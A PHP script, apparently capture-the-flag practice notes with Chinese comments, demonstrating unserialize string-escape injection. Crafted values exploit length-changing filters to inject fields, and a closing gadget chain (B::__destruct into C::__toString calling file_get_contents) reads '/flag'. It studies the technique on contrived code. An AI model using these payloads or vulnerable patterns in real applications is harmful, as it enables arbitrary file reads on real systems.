<?php

function filter($string){
    $filter = '/p/i';
    return preg_replace($filter,'WW',$string);
}


$username = 'pppppppppppppppppp';
$age = "10";
$user = array($username, $age);

//var_dump(serialize($user));
$r = filter(serialize($user));
//var_dump($r);
//var_dump(unserialize($r));

$str = <<<EOF
";i:1;s:2:"10";}
EOF;
//var_dump($str);
// 字符增量 = 逃逸字符
// 2x - x = 16

//'pppppppppppppppp";i:1;s:2:"20";}'

/*
string(63) "a:2:{i:0;s:32:"pppppppppppppppp";i:1;s:2:"20";}";i:1;s:2:"10";}"
string(79) "a:2:{i:0;s:32:"WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW";i:1;s:2:"20";}";i:1;s:2:"10";}"
*/
$username = 'pppppppppppppppp";i:1;s:2:"20";}';
$age = "10";
$user = array($username, $age);

var_dump(serialize($user));
$r = filter(serialize($user));
var_dump($r);
var_dump(unserialize($r));

// 字符串变少

function filter2($string){
    $filter = '/pp/i';
    return preg_replace($filter,'W',$string);
}

/*
string(127) "a:2:{i:0;s:62:"pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp";i:1;s:35:"...................";i:1;s:2:"20";}";}"
string(96)  "a:2:{i:0;s:62:"WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW";i:1;s:35:"...................";i:1;s:2:"20";}";}"

 * */

$username = 'pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp';
$age = '...................";i:1;s:2:"20";}';
$user = array($username, $age);

var_dump(serialize($user));
$r = filter2(serialize($user));
var_dump($r);
var_dump(unserialize($r));




/*
string(118) "O:4:"User":2:{s:8:"username";s:39:"ppppppppppppppppppppppppppppppppppppppp";s:3:"age";s:23:"A";s:3:"age";s:2:"24";}";}"
string(99)  "O:4:"User":2:{s:8:"username";s:39:"WWWWWWWWWWWWWWWWWWWp";s:3:"age";s:23:"A";s:3:"age";s:2:"24";}";}"

string(127) "O:4:"User":2:{s:8:"username";s:48:"pppppppppppppppppppppppppppppppppppppppppppppppp";s:3:"age";s:23:"A";s:3:"age";s:2:"24";}";}"
string(103) "O:4:"User":2:{s:8:"username";s:48:"WWWWWWWWWWWWWWWWWWWWWWWW";s:3:"age";s:28:"AAAAAA";s:3:"age";s:2:"24";}";}"

*/


class User {
    public $username = 'pppppppppppppppppppppp';
    public $age = 'A";s:3:"age";s:2:"24";}';
}
$user = new User();
//$user->$username = 'pppppppppppppppppppppppppppppppppp';
//$username = '";i:1;s:2:"20";}';
//$user->$age = '10';

var_dump(serialize($user));
$r2 = filter2(serialize($user));
var_dump($r2);
var_dump(unserialize($r2));



function write($data) {

    return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);

}



function read($data) {

    return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);

}



class A{

    public $username;

    public $password;

    function __construct($a, $b){

        $this->username = $a;

        $this->password = $b;

    }

}



class B{

    public $b = 'gqy';

    function __destruct(){

        $c = 'a'.$this->b;

        echo $c;

    }

}



class C{

    public $c;

    function __toString(){

        echo file_get_contents($this->c);

        return 'nice';

    }

}


$geta = "";
$getb = "";

$geta = "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
$getb = <<<EOF
i";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:5:"/flag";}}}
EOF;
$a = new A($geta, $getb);
$b = unserialize(read(write(serialize($a))));

//var_dump($a);
//var_dump($b);


//$a = array("echo 123+456;");
//eval($a);